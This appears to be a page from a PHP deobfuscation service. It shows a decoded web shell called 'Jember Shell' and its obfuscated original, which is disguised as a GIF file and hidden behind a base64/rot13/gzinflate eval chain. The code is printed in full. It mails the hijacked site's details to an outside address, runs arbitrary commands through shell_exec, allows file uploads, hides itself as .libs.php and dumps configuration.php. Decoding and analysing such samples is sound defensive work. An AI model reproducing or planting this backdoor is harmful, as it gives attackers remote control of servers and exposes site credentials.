Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
GIF89a????????????djancok??????????????? <?php /************************************..
Decoded Output download
error_reporting(0);
if (!isset($_SESSION['bajak'])) {
$visitcount = 0;
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$body = "Target ditemukan
$web$inj";
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE = OFF";}
else {$security= "SAFE_MODE = ON";};
$serper=gethostbyname($_SERVER['SERVER_ADDR']);
$injektor = gethostbyname($_SERVER['REMOTE_ADDR']);
mail("[email protected]", "$body","Hasil Bajakan http://$web$inj
$security
IP Server = $serper
IP Injector= $injektor");
$_SESSION['bajak'] = 1;
}
else {$_SESSION['bajak']++;};
if(isset($_GET['clone'])){
$source = $_SERVER['SCRIPT_FILENAME'];
$desti =$_SERVER['DOCUMENT_ROOT']."/.libs.php";
rename($source, $desti);
}
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE : OFF";}
else {$security= "SAFE_MODE : ON";}
echo "<title>Jember Shell</title><br>";
$dataku = "POWERED BY DC";
echo "<font size=2 color=blue><b>".$dataku."</b><br>";
echo "<font size=2 color=#888888><b>".$security."</b><br>";
$cur_user="(".get_current_user().")";
echo "<font size=2 color=#888888><b>User : uid=".getmyuid().$cur_user." gid=".getmygid().$cur_user."</b><br>";
echo "<font size=2 color=#888888><b>Uname : ".php_uname()."</b><br>";
function pwd() {
$cwd = getcwd();
if($u=strrpos($cwd,'/')){
if($u!=strlen($cwd)-1){
return $cwd.'/';}
else{return $cwd;};
}
elseif($u=strrpos($cwd,'\')){
if($u!=strlen($cwd)-1){
return $cwd.'\';}
else{return $cwd;};
};
}
if(isset($_GET['dcx'])){
echo '<form method="POST" action=""><font size=2 color=#888888><b>Command</b><br><input type="text" name="cmd"><input type="Submit" name="command" value="cok"></form>';
echo '<form enctype="multipart/form-data" action method=POST><font size=2 color=#888888><b>Upload File</b></font><br><input type=hidden name="submit"><input type=file name="userfile" size=28><br><font size=2 color=#888888><b>New name: </b></font><input type=text size=15 name="newname" class=ta><input type=submit class="bt" value="Upload"></form>';
if(isset($_POST['submit'])){
$uploaddir = pwd();
if(!$name=$_POST['newname']){$name = $_FILES['userfile']['name'];};
move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name);
if(move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name)){
echo "Upload Failed";
} else { echo "Upload Success to ".$uploaddir.$name." Succes! "; }
}
}
if(isset($_POST['command'])){
$cmd = $_POST['cmd'];
echo "<pre><font size=3 color=#000000>".shell_exec($cmd)."</font></pre>";
}
elseif(isset($_GET['cmd'])){
$comd = $_GET['cmd'];
echo "<pre><font size=3 color=#000000>".shell_exec($comd)."</font></pre>";
}
else { echo "<pre><font size=3 color=#000000>".shell_exec('ls -la')."</font></pre>";
}
if(isset($_GET['db'])){
$conf = file_get_contents("../../../configuration.php");
echo $conf;
}
Did this file decode correctly?
Original Code
GIF89a????????????djancok???????????????
<?php
/********************************************/
eval(gzinflate(str_rot13(base64_decode('rUl4QutTEP1cpPsflnokO7rghEmVEGBnucSUR4XQOHZIAbL82JAlttdNr4EU8d87s3jnwauX6iIkkpk58zh7aRYmpZCBcYWQiuc3abe9/3aDQoi9ycuSKbsV+J7v9wfnl0kU3oYz67rd/uHx01PrjpdcxaLKFWRWF0CtexbBVAQM//SGl/RnNLoIQQf+iF6jm+e3eO6h98fY81TBa9g3AZFV5hBOVKG8bookXLGsmoU5ucoxNyagGEqGE5ZoEwaxX2vOAwi2LTQGmVWYtRhgEdgmj62SxZXkdw75/aMTLzgb9DxVMDg5oftCnzZLTbJqos4hVZdzsmDShYpGRKp1nocZsxcjTOZiY9TrDYGnbXU2Rk9PkrdAUO95MPJJQEzIRpveipnAE5lk2e3ufpmHRiGcSzg8oVuEd7LoFj0NWJ6Sr2syQNRHqW+v03bYAt6aga7y/gXxmbxw2Fc9x0hBwNqHFnB1Ecxat0f3/uLkAbkDjiVdLyI+f9Y88YndqOdKYmd2xanIGSoHhUaKV8Z5SAqWfzzsX4yCk/7v3vnRmXR2OSSsR5y4y6je4Gt85p2PguFgMLKuHdpkRR6VQTEtQxeSGW9a/i1vErRaw99ENHvfJJo9IxoIiqeC0APFSMoOf3BMBCfgQkyaHmeM7SCSh03XVqjCTIU34G/wlzf0beTr36RqjL46yVHAeiv5P8z9icQihTOL0gozHEWnhjv0oBMtZb6J+2RK/9TQc4JoYwuMTgVFZKlaHSAsAAOwrLTRYTu0/a01xgAAVyqeuDpGNoePkG5EwqHkc+m8bO786FlwlAIUpCiOoNLCda+nmUdsrLjIVmQPxQgqM75CzD2N0XFn3KrcRVZMiNJT/5bVsbSMtXgTfSnLtau9vYMOyUclZoIWB4IbnTyu2PUdqe2vlbi6+lUNiH67iCn0/D4m8VB9GzWZFpApM5LhgoIzuMCVWk/Njljp4ftHH4ssC/OkofaA51KliJoXzKWKPShXkH2XxkxP171+FXJ86TdsKLkLTtP4fQbxHezs0Npf75TB0ekUTJUqXoRF6bh6vAJa5804OM1/jDAuRREm5ISnWY/RwegX01lskrC87rY0va8FWQBfu0S1+JXWNWpatmq7OHT3Gr1USZtLyY95GvTOL2idnN3jB1fiNCxYSoV4ANNx7aORTWN4Bl6jalIiyNilcsDN0q40IuH4bRTL27HZ0n00mLodAD13h17yuNX9WKuhxLqGOB2kFZqJOxaY7CwJMMB+FaKyIjAw2OyLYRxdpmHmu6RNXAraqAJecJbgxmsic+GTNb9fxTErWKLA5DxCB3jN+DcJ3SdC+jI+vU9pLf6GergrmrramSX6UqwXXyHZqpJ+YZTU1T+wzlh8XQL2wG8bM+m9dMTUTixdWz7r72e2eU7UPSwd/7cF8WEPCz4/lNVXWLKdhtYbiV9MbNFlsnwCk6EaAv2oARoetRLeOKdwfjGE30cyxFKi/791N8N4OBb5Fw==')))); ?>
Function Calls
gzinflate | 1 |
str_rot13 | 1 |
base64_decode | 1 |
Stats
MD5 | 2cb9f616d5931604ddf250f78d5443bd |
Eval Count | 1 |
Decode Time | 137 ms |